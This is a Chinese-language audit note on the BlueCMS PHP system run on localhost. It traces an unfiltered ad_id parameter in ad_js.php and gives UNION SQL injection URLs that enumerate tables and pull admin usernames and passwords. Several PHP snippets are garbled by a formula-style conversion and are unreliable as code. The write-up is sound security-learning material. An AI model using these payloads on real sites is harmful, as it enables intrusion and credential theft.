bluecms审计笔记

##title:bluecms审计笔记

在本地下载bluecms源码并搭建

利用代码审计工具进行自动扫描，一一审计可能出现的漏洞

第一条说存在sql注入，我们点开这个文件看看。

在ad_js.php中

$ad = $db->getone("SELECT\ast FROM".table{(}^{\prime }a{d}^{\prime })."WHEREa{d}_{i}d=".$ad_id);

自定义的getone()函数中的语句是查询ad表有多少列的。查询条件是$ad_id。那我们定位getone()函数看看

在mysql.class.php中

function getone($sql, $type=MYSQL_ASSOC){
$query = $this->query($sql,$this->linkid);
$row=mysq{l}_{f}etc{h}_{a}rray($query, $type);
return $row;
}

常规的数据库查询语法，我们再看看$ad_id，全文搜索，发现如下

$a{d}_{i}d=!empty($_GET[‘ad_id’]) ? trim($_GET[‘ad_id’]) : ‘’;

$ad_id没有做任何过滤处理，导致sql注入

• trim — 去除字符串首尾处的空白字符（或者其他字符）
• empty — 检查一个变量是否为空

那我们在本地环境，找到ad_js.php页面进行，构造注入

发现字段为7，这里为布尔注入，正确返回空页面，错误返回错误页面。
查数据库：

view-source:http://localhost:8088/bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema=database()

查表：

view-source:http://localhost:8088/bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema=0x626c7565636d73

当然可以查询所有的表：

view-source:http://localhost:8088/bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()

效果如下，就不用一个个查询了

• concat
• concat_ws
• group_concat
• 连接多个字符串成一个字符的函数

查询账号密码：

view-source:http://localhost:8088/bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,GROUP_CONCAT(admin_name,0x3a,pwd) FROM blue_admin

第一个注入漏洞审计完成。

点开第二条可能出现的漏洞的文件ann.php

• $current_act = $db->getfirst("SELECTca{t}_{n}ameFROM".table{(}^{\prime }an{n}_{c}a{t}^{\prime })."WHEREcid=".$cid);

• $db->query("UPDATE".table{(}^{\prime }an{n}^{\prime })."SETclick=click+1WHEREan{n}_{i}d=".$ann_id);

跟进$an{n}_i和$cid变量

发现被intval函数给限制了

• intval — 获取变量的整数值

点开第三条可能出现的漏洞文件comment.php
$id变量限制和第二一样

点开第四条index.php
同上，就说了

点开第五条
追踪$id参数

$id=!empty($_REQUEST[‘id’]) ? intval($_REQUEST[‘id’]) : ‘’;

这里也被限制了。